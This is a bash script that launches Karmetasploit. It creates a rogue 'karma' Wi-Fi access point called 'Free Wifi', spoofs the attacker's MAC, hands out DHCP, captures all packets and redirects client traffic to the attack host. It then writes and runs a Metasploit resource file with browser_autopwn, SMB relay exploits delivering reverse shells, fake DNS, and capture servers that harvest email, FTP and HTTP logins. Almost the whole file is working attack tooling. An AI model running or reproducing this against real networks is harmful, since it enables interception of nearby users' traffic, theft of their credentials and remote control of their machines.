#!/bin/bash
#=================================================
#
# FILE: kmsapng.sh
#
# USAGE: ./kmsapng.sh <options>
#
# DESCRIPTION: Script to launch Karmetasploit (rogue "karma" access point feeding clients into Metasploit)
#
# OPTIONS: Wireless card supported by Aircrack-ng for injection.
#	   File with MAC addresses for filtering connection 
# BUGS: Has only been tested with Atheros, Realtek L8187 and Ralink 2750 cards.
# NOTES: The latest SVN version of Aircrack-ng as well as the latest drivers must be used.
# AUTHOR: carlos_perez(at)darkoperator.com
# VERSION: 0.3.3
# CREATED: 09/23/2008 02:06:42 PM
# REVISION:10/15/2008 5:00 PM added options for launching, only have spent 50 min 
#          in total writing the script I know if I had more time I could add more to it.
#	   12/23/08 added options for using patched madwifi drivers with DigiNinja Karma patch
#	   with this drivers attack is much stable and faster to implement, only limitation is
#	   that only works with atheros cards.
#	   4/18/09 made changes to the creation of the Metasploit resource file do to changes in MSF.
#=================================================
# ---- Defaults (each can be overridden from the command line, see usage) ----
#Generated or user-supplied dhcpd configuration file
DHCPDCONF="/tmp/dhcpd.conf"
#Folder that receives the MSF database and the capture file (trailing slash expected)
LOGDEST="/root/"
#Wireless interface (-i) and attack mode (-m); both are mandatory
IW=""
MODE=""
#SSID the fake AP broadcasts initially
SSID="Free Wifi"
#Client MAC allow-list and Metasploit resource script; a path that cannot
#exist stands for "not provided"
FILTER="/noexist"
MR="/noexist"
#Number of arguments handed to the script
NUM=$#
# ---- Run-time values ----
#Launch timestamp, suffixed to every log / capture / db file name
NOW=$(date "+-%b-%d-%y-%H%M%S")
#Troubleshooting log collecting the output of the tools that are started
LOGFILE="/root/karma${NOW}.log"
#Interface names that receive driver-specific handling in monitormode
A1="ath0"
A2="wlan0"
#Ctrl-C hands control to cleanup, which stops every process this script started
trap cleanup INT
#Usage function for printing the help message
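# Print the command-line help on stdout.
# The script name shown is the real file name (the old text said kmsap.sh)
# and the -f / -l descriptions are corrected ("one MAC address per line").
# Arguments: none.  Returns: 0.
function usage ()
{
	cat <<'EOF'
Karmetasploit AP launcher by Carlos Perez for Backtrack3
Version 0.3.3
carlos_perez[at]darkoperator.com
usage: kmsapng.sh <options>

Options:
-m <mode>        : Every mode is a different approach of the attack.
			 km 	for regular karmetasploit attack using airbase-ng
			 kmf 	for filtered attack where only targeted
				clients can associate to the fake AP using the
			     	filter file.
			 kma 	for karmetasploit attack using DigiNinja patched
			     	madwifi drivers.
			 kmaf	for karmetasploit attack using DigiNinja patched
			     	madwifi drivers and mac address filtering.
-i <interface>   : Interface supported by aircrack-ng for injection
-f <filter file> : Text file with mac addresses of client computers
                   permitted to connect to the fake AP, used with kmf and
			 kmaf modes, one MAC address per line.
-s <ssid>        : SSID name used as the initial broadcast (Optional)
-r <msf3 script> : Metasploit Resource Script (Optional)
-d <conf file>   : Dhcpd configuration file (Optional)
-l <log folder>  : Destination for log files (MSF db and cap file), include
		   the trailing /, e.g. /tmp/ (Optional)
-h               : This help message

Note: mode and interface are required for all types of attacks and -f for filtered attacks
EOF
}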
#Function for starting the Atheros interface using Madwifi drivers patched with DigiNinja Karma Patch
#http://www.digininja.org
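# Bring an Atheros card up as a karma AP on ath0 using the DigiNinja-patched
# madwifi driver (http://www.digininja.org).
# Globals: LOGDEST (read, reset to /root/ if missing), SSID (read),
#          CHANNEL (read, optional, default 6).
# Calls cleanup (which exits 1) if the driver lacks the karma patch.
function athap ()
{
	# LOGDEST is quoted: with the original unquoted test an empty LOGDEST
	# made "[ -d ]" true and the missing-folder fallback never ran.
	if [[ -d "$LOGDEST" ]]; then
		echo "All logs will be saved to ${LOGDEST}"
	else
		echo "Log folder provided does not exist, saving to /root"
		LOGDEST="/root/"
	fi

	# Destroy any existing ath* VAPs and create a fresh AP-mode one
	# (based on HD Moore's original karmetasploit scripts).
	find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -I {} wlanconfig {} destroy
	echo "Master Mode: $(wlanconfig ath0 create wlandev wifi0 wlanmode ap)"
	# Random MAC so the attack box is not trivially identifiable in captures.
	macchanger -A ath0

	# Enable KARMA mode (answer every probe request); only the patched
	# driver knows the private ioctl, so failure means the wrong driver.
	if ! iwpriv ath0 karma 1; then
		echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
		echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"
		cleanup    # tears everything down and exits 1; never returns
	fi
	echo -e "\033[1;32mStarting Atheros Card in Karma Mode Succesful\033[1;37m"

	# Configure the AP. 10.0.0.1/24 must match the router/DNS address that
	# the generated dhcpd.conf hands out to clients.
	iwconfig ath0 essid "$SSID"
	iwconfig ath0 mode master
	iwconfig ath0 channel "${CHANNEL:-6}"
	ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
}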
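# Start the infrastructure behind the madwifi AP: dhcpd on ath0, a full
# packet capture and a NAT redirect of all inbound traffic to this host.
# Globals: DHCPDCONF (read; set to the generated file when missing),
#          LOGDEST, LOGFILE, NOW (read).
# Calls cleanup (exits 1) when dhcpd cannot be started.
function athinf ()
{
	if [[ -e "$DHCPDCONF" ]]; then
		echo "Using ${DHCPDCONF} for DHCPD"
	else
		echo -e "\033[1;31mConfiguration file for dhcpd does not exist or not provided generating dhcpd.conf file\033[1;37m"
		# Truncate (>) instead of appending: the original only appended to
		# /tmp/dhcpd.conf, so a leftover from an earlier run produced a
		# duplicated subnet block and dhcpd refused to start.
		# NOTE(review): /tmp/dhcpd.conf is a fixed, predictable path written
		# as root; a symlink planted there by another local user would be
		# followed. mktemp would be safer, but cleanup removes this exact path.
		cat > /tmp/dhcpd.conf <<'EOF'
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;}
EOF
		DHCPDCONF="/tmp/dhcpd.conf"
	fi
	#Clear any dhcp leases that might have been left behind
	[[ -d /var/lib/dhcp3 ]] && : > /var/lib/dhcp3/dhcpd.leases
	# dhcpd3 daemonises itself (no -f), so a foreground call returns once the
	# daemon is up and its exit status is meaningful. The original started it
	# with '&', which made the following "$?" test always succeed.
	if ! dhcpd3 -cf "$DHCPDCONF" ath0 >> "$LOGFILE" 2>&1; then
		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
		cleanup
	fi
	echo -e "\033[1;32mDHCPD started succesfully\033[1;37m"
	sleep 2
	#capture all packets
	echo -e "\033[1;32mStarting Packet capture to ${LOGDEST}kms${NOW}.cap\033[1;37m"
	tcpdump -ni ath0 -s 0 -w "${LOGDEST}kms${NOW}.cap" >/dev/null 2>&1 &
	# Redirect every inbound connection on ath0 to this host so clients with
	# cached DNS answers still reach the local capture services. The rule
	# stays in the nat table after the script exits unless it is deleted.
	iptables -t nat -A PREROUTING -i ath0 -j REDIRECT
}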

#function to put the interface in monitor mode (and randomise its MAC)
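# Put the wireless interface into monitor mode with a random MAC.
# Globals: IW (read; rewritten to mon0 for wlan0), A1/A2 (read),
#          LOGDEST (read, reset to /root/ if missing), LOGFILE (read).
function monitormode ()
{
	if [[ -d "$LOGDEST" ]]; then
		echo "All logs will be saved to ${LOGDEST}"
	else
		# Keep the trailing slash: file names are built as "${LOGDEST}kms...",
		# so the original fallback "/root" produced "/rootkms-....cap".
		echo "Log folder provided does not exist, saving to /root"
		LOGDEST="/root/"
	fi

	# The commands below used to be backgrounded with '&', so "down",
	# "destroy" and "airmon-ng start" raced each other; they now run in order.
	if [[ "$IW" == "$A1" ]]; then
		# madwifi: drop the ath0 VAP and start monitor mode on the wifi0 parent
		ifconfig "$IW" down >> "$LOGFILE" 2>&1
		wlanconfig ath0 destroy >> "$LOGFILE" 2>&1
		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
		macchanger -A wifi0
		airmon-ng start wifi0 >> "$LOGFILE" 2>&1
		sleep 2
	elif [[ "$IW" == "$A2" ]]; then
		ifconfig "$IW" down >> "$LOGFILE" 2>&1
		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
		macchanger -A wlan0
		airmon-ng start wlan0 >> "$LOGFILE" 2>&1
		# the script assumes airmon-ng exposes the monitor interface as mon0;
		# airbase-ng must be pointed at that one, not at wlan0
		IW=mon0
		sleep 2
	else
		# other drivers: interface is brought up (not down) first, as in the
		# original — presumably driver-specific, left unchanged
		ifconfig "$IW" up >> "$LOGFILE" 2>&1
		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
		macchanger -A "$IW"
		airmon-ng start "$IW" >> "$LOGFILE" 2>&1
		sleep 2
	fi
} # ---------- end of function monitormode ----------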
#function for cleaning up any process or configuration that might have been left behind; always exits 1
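# Stop everything the script started and exit. Runs on Ctrl-C (trap) and on
# every failure path, so nothing here may assume a previous step succeeded.
# Globals: LOGFILE, IW, MODE (read).  Never returns: exits 1.
function cleanup ()
{
	# -f: the generated files may not exist yet when cleanup runs early
	rm -f /tmp/dhcpd.conf
	rm -f /tmp/karma.rc
	# SIGTERM, not SIGKILL: tcpdump flushes its buffer and completes the
	# pcap on TERM, whereas -9 left the capture file truncated. Foreground,
	# so the processes are gone before the interface is torn down.
	killall dhcpd3 tcpdump airbase-ng >> "$LOGFILE" 2>&1
	[[ -d /var/lib/dhcp3 ]] && : > /var/lib/dhcp3/dhcpd.leases
	# Remove the NAT redirect added by startinf (at0) / athinf (ath0); the
	# one that was never added fails harmlessly into the log.
	iptables -t nat -D PREROUTING -i at0 -j REDIRECT >> "$LOGFILE" 2>&1
	iptables -t nat -D PREROUTING -i ath0 -j REDIRECT >> "$LOGFILE" 2>&1
	airmon-ng stop "$IW" >> "$LOGFILE" 2>&1
	if [[ "$MODE" == "kmaf" ]]; then
		# NOTE(review): "maccmd 1" is the same value athfiltered uses to turn
		# the ACL on, so this probably does not undo the filter; check the
		# madwifi maccmd table before changing it.
		iwpriv ath0 maccmd 1 >> "$LOGFILE" 2>&1
	fi
	exit 1
} # ---------- end of function cleanup ----------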
#Function for launching regular karmetasploit attack
function apall ()
{
	modprobe tun	
	echo -e "\033[1;32mstarting fake ap\033[1;37m"
	airbase-ng -P -C 60 -e "$SSID" $IW >> $LOGFILE 2>&1 &
	#give enough time before next command for interface to come up
	#specialy on Virtual Machines with USB cards
	echo "This will take 15 seconds .............."
	sleep 15
	
}
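# Load the client MAC allow-list into the madwifi ACL on ath0 and enable it.
# Globals: FILTER (read) — whitespace-separated MACs, blank lines and
#          '#' comments are ignored.
# Calls cleanup (exits 1) when FILTER cannot be read: running on without an
# ACL would leave the "filtered" AP open to every client.
function athfiltered ()
{
	if [[ -r "$FILTER" ]]; then
		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
		local line mac
		while IFS= read -r line || [[ -n "$line" ]]; do
			line=${line%%#*}
			# intentional word-splitting: several MACs per line were accepted
			# by the original "for M in $(cat ...)" loop
			# shellcheck disable=SC2086
			for mac in $line; do
				iwpriv ath0 addmac "$mac"
			done
		done < "$FILTER"
		# apply the list (madwifi "maccmd 1") once every entry is loaded
		iwpriv ath0 maccmd 1
	else
		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
		echo "$FILTER"
		# abort, as apfiltered does, instead of silently running unfiltered
		cleanup
	fi
}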
#Function for launching fake AP with MAC filtering
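# Start the fake AP with airbase-ng, restricted to the clients listed in FILTER.
# Globals: FILTER, SSID, IW, LOGFILE (read).
# Calls cleanup (exits 1) when FILTER is unreadable or airbase-ng dies.
function apfiltered ()
{
	# airbase-ng bridges clients onto the at0 TAP device, which needs tun
	modprobe tun
	if [[ -r "$FILTER" ]]; then
		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
		# --clients: only MACs from FILTER may associate
		airbase-ng -P -C 60 -e "$SSID" --clients "$FILTER" "$IW" >> "$LOGFILE" 2>&1 &
		local ap_pid=$!
		#give enough time before next command for interface to come up
		echo "This will take 15 seconds .............."
		sleep 15
		# airbase-ng keeps running until cleanup kills it; a dead pid here
		# means it failed to start, and the log holds its error output.
		if ! kill -0 "$ap_pid" 2>/dev/null; then
			echo -e "\033[1;31mairbase-ng exited, check $LOGFILE for errors\033[1;37m"
			cleanup
		fi
	else
		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
		echo "$FILTER"
		cleanup
	fi
}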
#function for setting the MTU value, launching the DHCP server, starting the packet capture
#and setting the NAT redirect for clients with cached DNS entries (Metasploit itself is started by lmeta)
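# Bring up the infrastructure behind the airbase-ng AP: address at0, set the
# MTU, start dhcpd and the packet capture, add the NAT redirect.
# Globals: DHCPDCONF (read; set to the generated file when missing),
#          IW, LOGDEST, LOGFILE, NOW (read).
# Calls cleanup (exits 1) when at0 cannot be configured or dhcpd fails.
function startinf () 
{
	if [[ -e "$DHCPDCONF" ]]; then
		echo "File Exists"
	else
		echo -e "\033[1;31mConfiguration file for dhcpd does not exist or not provided generating dhcpd.conf\033[1;37m"
		# Truncate (>) instead of appending: the original only appended to
		# /tmp/dhcpd.conf, so a leftover from an earlier run produced a
		# duplicated subnet block and dhcpd refused to start.
		# NOTE(review): /tmp/dhcpd.conf is a fixed, predictable path written
		# as root; a symlink planted there by another local user would be
		# followed. mktemp would be safer, but cleanup removes this exact path.
		cat > /tmp/dhcpd.conf <<'EOF'
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;}
EOF
		DHCPDCONF="/tmp/dhcpd.conf"
	fi
	# at0 is the TAP device airbase-ng creates; 10.0.0.1 is the gateway and
	# DNS address dhcpd.conf hands out. Any non-zero status (the original
	# only recognised 255) means the AP is not up.
	if ! ifconfig at0 up 10.0.0.1 netmask 255.255.255.0; then
		echo -e "\033[1;31mIt appears the AP did not start check $LOGFILE for errors\033[1;37m"
		cleanup
	fi
	# Raise the MTU on the wireless side, falling back to a smaller MTU on
	# at0 if the driver refuses. Redirections are ordered so stderr reaches
	# the log too (the original "2>&1 >>" sent it to the terminal).
	if ! ifconfig "$IW" mtu 1800 >> "$LOGFILE" 2>&1; then 
		ifconfig at0 mtu 1400 >> "$LOGFILE" 2>&1
	fi 
	
	sleep 2
	#Clear any dhcp leases that might have been left behind
	[[ -d /var/lib/dhcp3 ]] && : > /var/lib/dhcp3/dhcpd.leases
	# dhcpd3 daemonises itself (no -f), so a foreground call returns once the
	# daemon is up and its exit status is meaningful. The original started it
	# with '&', which made the following "$?" test always succeed.
	if ! dhcpd3 -cf "$DHCPDCONF" at0 >> "$LOGFILE" 2>&1; then
		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
		cleanup
	fi
	echo -e "\033[1;32mDHCPD started succesfully\033[1;37m"
	sleep 2
	#capture all packets (message now names the real file; it said kms.cap before)
	echo -e "\033[1;32mStarting Packet capture to ${LOGDEST}kms${NOW}.cap\033[1;37m"
	tcpdump -ni at0 -s 0 -w "${LOGDEST}kms${NOW}.cap" >/dev/null 2>&1 &
	# Redirect every inbound connection on at0 to this host so clients with
	# cached DNS answers still reach the local capture services. The rule
	# stays in the nat table after the script exits unless it is deleted.
	iptables -t nat -A PREROUTING -i at0 -j REDIRECT
} 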
#Function for launching Metasploit
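# Run msfconsole with the operator's resource script (MR) or with a generated
# one (browser_autopwn, SMB relay and credential-capture servers, all bound
# to the 10.0.0.1 address the fake AP hands out), then tear everything down.
# Globals: MR, LOGDEST, NOW (read); MSFCONSOLE (read, optional override of
#          the BT3 path /pentest/exploits/framework3/msfconsole).
# Never returns: ends in cleanup, which exits 1.
function lmeta ()
{
	local msfconsole="${MSFCONSOLE:-/pentest/exploits/framework3/msfconsole}"
	if [[ -r "$MR" ]]; then
		echo -e "\033[1;32mStarting Metasploit with Resource File Provided\033[1;37m"
		"$msfconsole" -r "$MR"
	else
		echo -e "\033[1;32mCreating Temporary Metasploit with Resource File\033[1;37m"
		# unpredictable temp name; the original wrote a fixed /tmp/karma.rc
		local rc
		rc=$(mktemp /tmp/karma.XXXXXX) || cleanup
		# unquoted delimiter on purpose: LOGDEST / NOW are expanded
		cat > "$rc" <<EOF
db_driver sqlite3
db_create ${LOGDEST}karma${NOW}.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.1
set SRVPORT 139
set LPORT 1390
exploit
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.1
set SRVPORT 445
set LPORT 4450
exploit
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
run
use auxiliary/server/capture/http
set SRVPORT 80
set BGIMAGE /msf3/load.gif
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set BGIMAGE /msf3/load.gif
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set BGIMAGE /msf3/load.gif
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set BGIMAGE /msf3/load.gif
set SSL true
run
EOF
		echo -e "\033[1;32mStarting Metasploit\033[1;37m"
		"$msfconsole" -r "$rc"
		rm -f "$rc"
	fi
	# Always tear the AP, dhcpd and capture down, whatever msfconsole's exit
	# status: the original "msfconsole && cleanup" skipped cleanup when
	# msfconsole crashed or was missing, leaving the rogue AP running.
	cleanup
}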

#--------------------MAIN-----------------------
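# Everything below reconfigures interfaces, iptables and dhcpd, so refuse to
# run unprivileged rather than fail half-way with a partly configured card.
if [[ $EUID -ne 0 ]]; then
	echo -e "\033[1;31mThis script must be run as root\033[1;37m"
	exit 1
fi
# 'h' is in the option string so -h reaches its own case (it used to fall
# through to '\?' and exit 1); ':' catches a flag without its argument.
while getopts ":m:i:f:s:r:d:l:h" options; do
  case "$options" in
    m ) MODE=$OPTARG;;
    i ) IW=$OPTARG;;
    f ) FILTER=$OPTARG;;
    s ) SSID=$OPTARG;;
    r ) MR=$OPTARG;;
    d ) DHCPDCONF=$OPTARG;;
    l ) LOGDEST=$OPTARG;;
    h ) usage
        exit 0;;
    : ) echo "Option -$OPTARG requires an argument" >&2
        usage
        exit 1;;
    \? ) usage
         exit 1;;
    * ) usage
        exit 1;;
  esac
done
shift $((OPTIND - 1))

# troubleshooting log lives next to the other artefacts in LOGDEST
LOGFILE="${LOGDEST}karma.log"
if [[ -n "$MODE" && -n "$IW" ]]; then
	# each function below calls cleanup (exit 1) on failure, so a mode's
	# steps only run in sequence while the previous one succeeded
	case "$MODE" in
	km) monitormode 
     		apall
     		startinf 
		lmeta;;
	kmf) monitormode
      		apfiltered 
      		startinf 
		lmeta ;;
	kma) athap
		athinf
		lmeta ;;	
	kmaf) athap
		athinf
		athfiltered
		lmeta ;;	
	# an unknown mode used to do nothing and exit 0
	*) echo -e "\033[1;31mUnknown mode: $MODE\033[1;37m"
		usage
		exit 1 ;;
	esac
else
	usage
	exit 1
fi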


